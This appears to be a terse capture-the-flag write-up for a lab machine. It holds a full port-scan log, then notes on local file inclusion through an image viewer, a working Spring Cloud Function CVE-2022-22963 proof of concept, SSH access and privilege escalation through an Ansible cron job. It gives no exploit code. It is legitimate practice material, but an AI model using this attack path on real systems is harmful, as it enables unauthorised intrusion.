Hospital
Recon
nmap_scan.log
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
With RustScan, I scan ports so fast, even my firewall gets whiplash 💨
[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.228.213:22
Open 10.129.228.213:8080
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.228.213
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 19:58 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:58, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 19:58
Completed Parallel DNS resolution of 1 host. at 19:58, 0.11s elapsed
DNS resolution of 1 IPs took 0.11s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:58
Scanning 10.129.228.213 [2 ports]
Discovered open port 8080/tcp on 10.129.228.213
Discovered open port 22/tcp on 10.129.228.213
Completed Connect Scan at 19:58, 0.07s elapsed (2 total ports)
Initiating Service scan at 19:58
Scanning 2 services on 10.129.228.213
Completed Service scan at 19:58, 7.30s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.228.213.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:58
Completed NSE at 19:59, 2.51s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.33s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Nmap scan report for 10.129.228.213
Host is up, received user-set (0.071s latency).
Scanned at 2024-11-24 19:58:52 UTC for 10s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ca:f1:0c:51:5a:59:62:77:f0:a8:0c:5c:7c:8d:da:f8 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDKZNtFBY2xMX8oDH/EtIMngGHpVX5fyuJLp9ig7NIC9XooaPtK60FoxOLcRr4iccW/9L2GWpp6kT777UzcKtYoijOCtctNClc6tG1hvohEAyXeNunG7GN+Lftc8eb4C6DooZY7oSeO++PgK5oRi3/tg+FSFSi6UZCsjci1NRj/0ywqzl/ytMzq5YoGfzRzIN3HYdFF8RHoW8qs8vcPsEMsbdsy1aGRbslKA2l1qmejyU9cukyGkFjYZsyVj1hEPn9V/uVafdgzNOvopQlg/yozTzN+LZ2rJO7/CCK3cjchnnPZZfeck85k5sw1G5uVGq38qcusfIfCnZlsn2FZzP2BXo5VEoO2IIRudCgJWTzb8urJ6JAWc1h0r6cUlxGdOvSSQQO6Yz1MhN9omUD9r4A5ag4cbI09c1KOnjzIM8hAWlwUDOKlaohgPtSbnZoGuyyHV/oyZu+/1w4HJWJy6urA43u1PFTonOyMkzJZihWNnkHhqrjeVsHTywFPUmTODb8=
| 256 d5:1c:81:c9:7b:07:6b:1c:c1:b4:29:25:4b:52:21:9f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIUJSpBOORoHb6HHQkePUztvh85c2F5k5zMDp+hjFhD8VRC2uKJni1FLYkxVPc/yY3Km7Sg1GzTyoGUxvy+EIsg=
| 256 db:1d:8c:eb:94:72:b0:d3:ed:44:b9:6c:93:a7:f9:1d (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICZzUvDL0INOklR7AH+iFw+uX+nkJtcw7V+1AsMO9P7p
8080/tcp open nagios-nsca syn-ack Nagios NSCA
|_http-title: Home
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 19:59
Completed NSE at 19:59, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.80 secondsHTTP (8080)
2 users from /blog. admin and Brandon Auger, but none of the posts are readable.
http://10.129.228.213:8080/upload accepts only images, upload one valid one. Get redirected to http://10.129.228.213:8080/show_image?img=kraken.png
LFI is possible
The vulnerability oddly enough also supports directory listing so you can navigate the filesystem.
We can also enumerate users and this WebApp seems to be running as frank because we have read permissions.
Password doesn't work on SSH.
CVE-2022-22965: Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5 -- Doesn't work.
CVE-2022-22963-PoC -- works
Password authentication didn't work on SSH, but it works locally, meaning SSH has password disabled.
SSH
Upgrade to SSH
Still doesn't work, check SSH configuration:
Only phil user is denied access... We can SSH as frank and then elevate then.
User.txt
Privilege Escalation
There's some ansible cronjob which probably runs these playbooks and then removes them.
After ~10 seconds
Root.txt
Last updated